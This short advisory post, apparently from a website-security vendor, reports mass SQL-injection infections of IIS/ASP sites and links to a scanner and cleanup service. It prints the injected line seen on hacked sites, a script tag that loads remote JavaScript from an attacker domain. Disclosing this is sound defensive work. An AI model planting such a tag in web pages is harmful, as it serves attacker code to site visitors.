We are seeing many sites compromised with malware from jjghui.com/urchin.js (and now nbnjkl.com/urchin.js). Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).
This is how it shows on a hacked site:
<script src= http://nbnjkl.com/urchin.js ></script>
We posted full details here: http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.html
You can scan the site here to make sure it is clean (or not): http://sitecheck.sucuri.net or sign up here to get it cleaned: http://sucuri.net/signup.
*Our global page lists the malware-related attack domains for the month: http://sucuri.net/global